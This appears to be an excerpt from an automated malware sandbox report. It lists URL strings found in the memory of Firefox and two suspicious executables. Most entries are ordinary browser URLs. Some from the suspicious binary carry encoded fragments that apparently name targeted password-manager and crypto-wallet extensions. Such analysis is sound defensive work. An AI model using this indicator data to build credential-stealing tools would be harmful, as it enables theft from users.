Source: firefox.exe, 00000023.00000002.3321697398.0000028631045000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2978941920.000002862D252000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: 8ec8c5c339.exe, 00000008.00000003.2494959406.0000000028D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 00000023.00000002.3321697398.00000286310AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows
Source: firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaPlatformDecoderNotFound
Source: firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaWMFNeeded
Source: firefox.exe, 00000023.00000002.3108413567.000002862DAF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/website-translation
Source: firefox.exe, 00000023.00000002.3108413567.000002862DAF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/website-translationresource://gre/modules/ContentPrefServiceChild.sys
Source: 8ec8c5c339.exe, 00000008.00000003.2494959406.0000000028D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.orgmedia.autoplay.blocking_policy_migrateXULStoreForDocumentbookmarksToolbar
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.orgmigrateXULAttributeToStyletestPermissionFromPrincipalcreateContentPrincip
Source: 8ec8c5c339.exe, 8ec8c5c339.exe, 00000008.00000002.2738630098.0000000000400000.00000040.00000001.01000000.00000009.sdmp, 8ec8c5c339.exe, 00000008.00000003.2415301062.00000000229F1000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.0000000000400000.00000040.00000001.01000000.00000009.sdmp, 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.0000000000400000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
Source: firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://svgwg.org/svg2-draft/struct.html#SymbolNotes:
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 00000023.00000002.3321697398.0000028631045000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2978941920.000002862D252000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 00000023.00000002.2978941920.000002862D252000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://truecolors.firefox.com(7O
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 00000023.00000002.3321697398.0000028631031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://w3c.github.io/mathml-core/#dfn-maction
Source: firefox.exe, 00000023.00000002.3321697398.0000028631031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://w3c.github.io/mathml-core/#dfn-semantics
Source: firefox.exe, 00000023.00000002.3321697398.0000028631031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://w3c.github.io/mathml-core/#the-mathvariant-attribute
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: 8ec8c5c339.exe, 00000008.00000002.2772437100.0000000028AA1000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2628599943.00000238F2EAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2644160751.000001F4143C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 00000023.00000002.3337329658.0000028631F5D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3338983377.000002863207E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill
Source: firefox.exe, 00000023.00000002.3338983377.000002863207E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=utf-8&mode=blended&tag=mozill
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/chrome://extensions/content/schemas/notifications
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/moz-extension://a581a2f1-688c-434b-8db8-16166b199
Source: firefox.exe, 00000023.00000002.3168184572.000002862DC03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 00000023.00000003.2833188237.000002863208E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.certificate-transparency.org/what-is-ct
Source: 8ec8c5c339.exe, 00000008.00000002.2772437100.0000000028AA1000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2628599943.00000238F2EAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2644160751.000001F4143C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2608317826.00000238F7118000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3168184572.000002862DC03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3193026235.000002862DD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/policies/privacy/
Source: firefox.exe, 00000023.00000002.3168184572.000002862DC8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/policies/privacy/2
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/policies/privacy/mozIGeckoMediaPluginChromeService
Source: firefox.exe, 00000023.00000002.3337329658.0000028631F64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/searchpictureinpicture
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/searchwikipedia
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 00000023.00000002.3306154976.000002862E86B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: 8ec8c5c339.exe, 00000008.00000003.2494959406.0000000028D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: firefox.exe, 00000023.00000003.2911410230.000002863BF68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: 8ec8c5c339.exe, 00000008.00000003.2494959406.0000000028D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: 8ec8c5c339.exe, 00000008.00000003.2494959406.0000000028D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: 8ec8c5c339.exe, 00000008.00000003.2494959406.0000000028D48000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: firefox.exe, 0000001D.00000002.2644160751.000001F4143C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2996654486.000002862D349000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 00000018.00000002.2628599943.00000238F2E56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/J
Source: 8ec8c5c339.exe, 00000008.00000003.2494959406.0000000028D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 00000023.00000002.2978941920.000002862D252000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.orgL4
Source: firefox.exe, 00000018.00000002.2623557649.00000096528BB000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.orgo
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2629600629.00000238F2FB4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3350268483.000002863270E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3193026235.000002862DD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DAA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 00000023.00000002.3168184572.000002862DC8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.openh264.org//
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.openh264.org/getActiveAddons/
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3193026235.000002862DD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.widevine.com/
Source: firefox.exe, 00000023.00000002.3168184572.000002862DC8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.widevine.com/3
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.widevine.com/toolkit/about/aboutPlugins.ftlhttps://www.openh264.org/operationsRequiringR
Source: firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3168184572.000002862DC6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000023.00000002.3353317296.00000286329B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account
Source: firefox.exe, 00000017.00000002.2590223303.000001DEF7FD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account--attempting-deelevation
Source: 1c593ec106.exe, 00000009.00000002.2964260464.0000000006630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account7
Source: 1c593ec106.exe, 00000009.00000002.2964260464.0000000006630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account=
Source: firefox.exe, 00000015.00000002.2580813098.000001CBE7950000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2625098000.00000238E7430000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2817649774.0000025C6DB00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountC:
Source: firefox.exe, 00000018.00000002.2624675381.00000238E7390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountH
Source: 1c593ec106.exe, 00000009.00000002.2964260464.0000000006630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountI
